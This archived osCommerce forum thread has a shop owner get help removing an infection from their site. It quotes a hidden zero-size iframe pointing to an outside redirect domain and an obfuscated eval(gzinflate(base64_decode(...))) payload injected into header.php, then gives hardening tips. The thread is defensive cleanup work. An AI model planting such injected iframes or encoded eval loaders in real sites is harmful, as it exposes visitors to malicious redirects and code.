gcap Posted May 19, 2010 Posted May 19, 2010 Hi, Avast is saying my site www.brentwoodnursery.co.za/\{gzip} has traces of html:iframe-inf. I have spoken to my host who say that the site has not been hacked. I did install an add on to allow me to run a list of my products. the problem is that on my pc at work it doesnt issue any warning and I cant find any infected text or trace of the text 'iframe' in any index.php or index.html files. I have just launched the site and look really silly with new customes being told that the site is dangerous. I dont know where to find this infected text or how to erase this annoying issue.
germ Posted May 19, 2010 Posted May 19, 2010 From your HTML source: <!-- header //--> <iframe src="http://CoinUrlRedirection.com/x/?src=dg&id=20492" width="0" height="0" scrolling="no" frameborder="0"></iframe><!-- header_eof //--> Looks like it's in /includes/header.php If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you. "Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice." - Me - "Headers already sent" - The definitive help "Cannot redeclare ..." - How to find/fix it SSL Implementation Help Like this post? "Like" it again over there >
gcap Posted May 19, 2010 Author Posted May 19, 2010 Thank you ever so much, I ask you two things? 1. how did you find it so quick 2. what should i delete from here <?php /* $Id: header.php,v 1.42 2003/06/10 18:20:38 hpdl Exp $ osCommerce, Open Source E-Commerce Solutions http://www.oscommerce.com Copyright © 2003 osCommerce Released under the GNU General Public License */ eval(gzinflate(base64_decode('JY5NCsIwEEb3hd4hzMLuTClu1PwsvIHgATQZk4E0I9OAHl9bdx+8B+/zzvi+w5BZDYaecp9RLRIs5NZeJ60vTPUm5YqRBEMjrvvAs/5ov1ox7SjaaTwcJ1Bvii1bGEFlpJTbNpcgXArVZKEyqC3wYIkoK3ZG/5tuOPed/335Ag=='))); // check if the 'install' directory exists, and warn of its existence if (WARN_INSTALL_EXISTENCE == 'true') { if (file_exists(dirname($HTTP_SERVER_VARS['SCRIPT_FILENAME']) . '/install')) { $messageStack->add('header', WARNING_INSTALL_DIRECTORY_EXISTS, 'warning'); } } // check if the configure.php file is writeable if (WARN_CONFIG_WRITEABLE == 'true') { if ( (file_exists(dirname($HTTP_SERVER_VARS['SCRIPT_FILENAME']) . '/includes/configure.php')) && (is_writeable(dirname($HTTP_SERVER_VARS['SCRIPT_FILENAME']) . '/includes/configure.php')) ) { $messageStack->add('header', WARNING_CONFIG_FILE_WRITEABLE, 'warning'); } } // check if the session folder is writeable if (WARN_SESSION_DIRECTORY_NOT_WRITEABLE == 'true') { if (STORE_SESSIONS == '') { if (!is_dir(tep_session_save_path())) { $messageStack->add('header', WARNING_SESSION_DIRECTORY_NON_EXISTENT, 'warning'); } elseif (!is_writeable(tep_session_save_path())) { $messageStack->add('header', WARNING_SESSION_DIRECTORY_NOT_WRITEABLE, 'warning'); } } } // check session.auto_start is disabled if ( (function_exists('ini_get')) && (WARN_SESSION_AUTO_START == 'true') ) { if (ini_get('session.auto_start') == '1') { $messageStack->add('header', WARNING_SESSION_AUTO_START, 'warning'); } } if ( (WARN_DOWNLOAD_DIRECTORY_NOT_READABLE == 'true') && (DOWNLOAD_ENABLED == 'true') ) { if (!is_dir(DIR_FS_DOWNLOAD)) { $messageStack->add('header', WARNING_DOWNLOAD_DIRECTORY_NON_EXISTENT, 'warning'); } } if ($messageStack->size('header') > 0) { echo $messageStack->output('header'); } ?>
germ Posted May 19, 2010 Posted May 19, 2010 Evil code: eval(gzinflate(base64_decode('JY5NCsIwEEb3hd4hzMLuTClu1PwsvIHgATQZk4E0I9OAHl9bdx+8B+/zzvi+w5BZDYaecp9RLRIs5NZeJ60vTPUm5YqRBEMjrvvAs/5ov1ox7SjaaTwcJ1Bvii1bGEFlpJTbNpcgXArVZKEyqC3wYIkoK3ZG/5tuOPed/335Ag=='))); :o I have a program I wrote on the site I manage that I can tell it to visit any web page and it writes the source code of that web page to a text file so I can examine it. Very useful and written just for this purpose. :) If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you. "Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice." - Me - "Headers already sent" - The definitive help "Cannot redeclare ..." - How to find/fix it SSL Implementation Help Like this post? "Like" it again over there >
gcap Posted May 19, 2010 Author Posted May 19, 2010 Listen, that nearly cost me my business and certainly set us back a bit so a massive thank you - it has worked. Any advice to avoid it happening again? Hosts said the site wasnt hacked but something went wrong. Thank goodness people like you are around or I would have been stumped. Again, goodnight and thank you
germ Posted May 19, 2010 Posted May 19, 2010 Listen, that nearly cost me my business and certainly set us back a bit so a massive thank you - it has worked. Any advice to avoid it happening again? Hosts said the site wasnt hacked but something went wrong. Thank goodness people like you are around or I would have been stumped. Again, goodnight and thank you You need to protect your admin with a .htaccess file - ASAP In the admin remove file_manager.php and define_language.php - both are extreme security risks. And read the "How to secure your site" thread in this section of the forum. If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you. "Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice." - Me - "Headers already sent" - The definitive help "Cannot redeclare ..." - How to find/fix it SSL Implementation Help Like this post? "Like" it again over there >
gcap Posted May 19, 2010 Author Posted May 19, 2010 delete filemanager_php and define_language.php? any negatives to doing this? what exactly is a .htacess file
germ Posted May 20, 2010 Posted May 20, 2010 delete filemanager_php and define_language.php? any negatives to doing this? what exactly is a .htacess file Obviously you wouldn't be able to use said files, but they aren't necessary for shop operation. The file manager is a text editor (a faulty one at times). Better to use the one in your hosts cPanel or use FTP. I'm not sure what the define language file is for? :unsure: Search the web about .htaccess It adds another layer of protection to the admin. Both of the files I mentioned have secuuity issues that allow a hacker to bypass your admin login screen and access these files in a harmful fashion. That's probably how the rogue code got there to begin with. If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you. "Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice." - Me - "Headers already sent" - The definitive help "Cannot redeclare ..." - How to find/fix it SSL Implementation Help Like this post? "Like" it again over there >
Recommended Posts
Archived
This topic is now archived and is closed to further replies.